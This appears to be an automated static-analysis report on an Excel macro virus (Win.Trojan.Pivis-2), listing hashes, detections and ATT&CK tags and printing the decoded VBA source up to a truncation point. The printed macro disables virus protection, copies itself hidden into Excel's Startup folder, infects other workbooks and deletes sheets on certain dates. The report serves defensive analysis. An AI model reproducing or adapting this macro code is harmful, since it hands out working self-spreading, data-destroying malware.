Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 d9a693b36a1197e9…

MALICIOUS

Office (OLE)

35.5 KB Created: 1998-05-12 13:27:10 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: c2a7e8e2b9579d8d2dc256355364357d SHA-1: 57d24107f139b7c64ef2a4ae65bca162d3ff41d2 SHA-256: d9a693b36a1197e9c5d3fc8cba5ec60e57e98235b3df9a557182008841c4206f
220 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to save a file named 'FUCKPOL.XLM' to the startup path, indicating a likely downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Xls.Trojan.Neg-4' further support its malicious nature.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5451 bytes
SHA-256: a1e8b706d069ac185db2876655105c9e8dadeeaa13d29d14aa1b588b87e8b3c7
Detection
ClamAV: Xls.Trojan.Neg-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Police"


Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
CommandBars("window").Controls("Unhide...").Delete
If spy() Then
    GoTo shotme:
Else
    fire
End If
shotme:
Application.OnSheetActivate = "FUCKPOL.XLM!action"
bye:
Call effect
End Sub

Function spy() As Boolean
Attribute spy.VB_ProcData.VB_Invoke_Func = " \n14"
spy = False
For x = 1 To Application.Workbooks.Count
    If Application.Workbooks(x).Name = "FUCKPOL.XLM" Then
    For y = 1 To Application.Workbooks("FUCKPOL.XLM").Modules.Count
        If Application.Workbooks("FUCKPOL.XLM").Modules(y).Name = "Police" Then
            spy = True
        End If
    Next y
    End If
Next x
End Function

Function fire()
Attribute fire.VB_ProcData.VB_Invoke_Func = " \n14"
  activebook = ActiveWorkbook.Name
  Workbooks(activebook).SaveCopyAs Application.StartupPath + "\FUCKPOL.XLM"
  Workbooks.Open (Application.StartupPath + "\FUCKPOL.XLM")
  Windows("FUCKPOL.XLM").Visible = False
 Application.Workbooks("FUCKPOL.XLM").Save
End Function

Function statusme() As Boolean
Attribute statusme.VB_ProcData.VB_Invoke_Func = " \n14"
activebook = ActiveWorkbook.Name
statusme = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
    If Application.Workbooks(activebook).Modules(y).Name = "Police" Then
            statusme = True
   End If
Next y
End Function

Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"
    oactivebook = ActiveWorkbook.Name
    If statusme() Then
    GoTo bye2
    Else
    End If
    Application.ScreenUpdating = False
    Application.Windows("FUCKPOL.XLM").Visible = True
    Workbooks("FUCKPOL.XLM").Activate
    Sheets("Police").Visible = True
    Workbooks("FUCKPOL.XLM").Sheets("Police").Copy Before:=Workbooks(oactivebook).Sheets(1)
    Workbooks(oactivebook).Sheets("Police").Visible = False
    Workbooks("FUCKPOL.XLM").Sheets("Police").Visible = False
    Windows("FUCKPOL.XLM").Visible = False
bye2:
Close
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo bye3
Application.DisplayAlerts = False
Application.Workbooks("FUCKPOL.XLM").Save
Application.ActiveWorkbook.Save
bye3:
End Sub

Sub effect()
Attribute effect.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.UserName = "foxz" And Application.OrganizationName = "NoMercyVirusTeam" Then
GoTo boss
Else
End If
  If Day(Date) = "13" Or Day(Date) = "1" Or Day(Date) = "31" Then
  ActiveWindow.SelectedSheets.Delete
  Assistant.Visible = True
  With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Six students of Universitas Trisakti, Jakarta, died from bullets fired by security personnel during an action of concern staged by thousands of students at the campus of Universitas Trisakti, Grogol, West Jakarta, on Tuesday (12/5). The six students were shot while on campus by a flurry of bullets, suspected to be fired by security troops on the Grogol fly-over. Dozens of other students suffered serious and minor injuries."
    .Heading = "XM97.Fucking Police"
    .Animation = msoAnimationEmptyTrash
    .Show
  End With
  Assistant.Visible = False
  Assistant.Visible = True
  With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Until this report was prepared, around 200 students were still waiting in the corridors of the Sumber Waras Hospital, guarding their fellow-students still being treated in the Emergency Unit, as well as the remains of their colleagues laying in state. A moving atmosphere prevailed around t
... (truncated)